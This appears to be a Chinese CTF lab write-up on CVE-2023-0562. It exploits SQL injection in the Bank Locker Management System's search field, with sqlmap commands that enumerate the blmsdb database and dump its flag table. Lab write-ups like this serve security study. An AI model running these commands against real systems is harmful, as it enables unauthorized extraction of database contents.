春秋云境CVE-2023-0562

简介

银行储物柜管理系统是一个基于网络的应用程序,用于处理存储银行客户贵重物品的银行储物柜。储物柜的所有详细信息都保存在数据库中。银行储物柜管理系统项目是使用 PHP 和 MySQLi 扩展开发的。

正文

进入靶场,首先就看到有个bankers,点进去一看发现是个登录界面,那么我就开始尝试弱口令爆破发现没用,然后修改密码,需要邮箱和电话,恰好在主页有邮箱和电话,我尝试输入进去,然后发现这根本就是一个陷阱,没有用。

找到注入点

发现这里有个输入的地方,随便输入进去发现是个查询功能,那么就可能存在sql注入,那就话不多说,抓包上sqlmap

开始抓包

sqlmap开爆

python sqlmap.py -r 2.txt -batch -dbs

python sqlmap.py -r 2.txt -batch -D blmsdb -tables

>python sqlmap.py -r 2.txt -batch -D blmsdb -T fllllaaaag -columns

拿下靶场

python sqlmap.py -r 2.txt -batch -D blmsdb -T fllllaaaag -C flag -dump

相关推荐
爱编程的小吴8 分钟前
华为云部署Web平台渗透测试全流程计划
web安全·华为云
网安INF8 分钟前
电子邮件安全协议详解
网络·网络协议·安全·网络安全
Hi, how are you14 分钟前
GyAn数字资产守护系统
python·安全·http·网络安全·信息与通信
_Orch1d27 分钟前
《网络攻击与防御》复习笔记
笔记·安全·php
molaifeng29 分钟前
从 utf8.RuneCountInString 看 Go 是如何高性能、安全地解码 UTF-8 的
开发语言·安全·golang
CertiK36 分钟前
CertiK年度安全报告:2025年Web3损失同比增37%,钓鱼攻击与供应链事件成主要威胁
安全·web3
缘友一世38 分钟前
现代密码学【4】之计算安全性&安全规约证明&对称加密的窃听不可区分实验
安全·密码学
yi个名字38 分钟前
AI 应用的 SRE 视角:延迟、可靠性、成本与安全如何在一套系统里闭环
人工智能·安全
乾元39 分钟前
红队 / 蓝队:用 AI 自动生成攻击场景并评估防御效果——从“安全演练”到“可计算的网络对抗系统”
运维·网络·人工智能·网络协议·安全·web安全·架构
xiatianxy40 分钟前
有限空间作业安全如何更有保障!
安全·有限空间作业·有限空间监测设备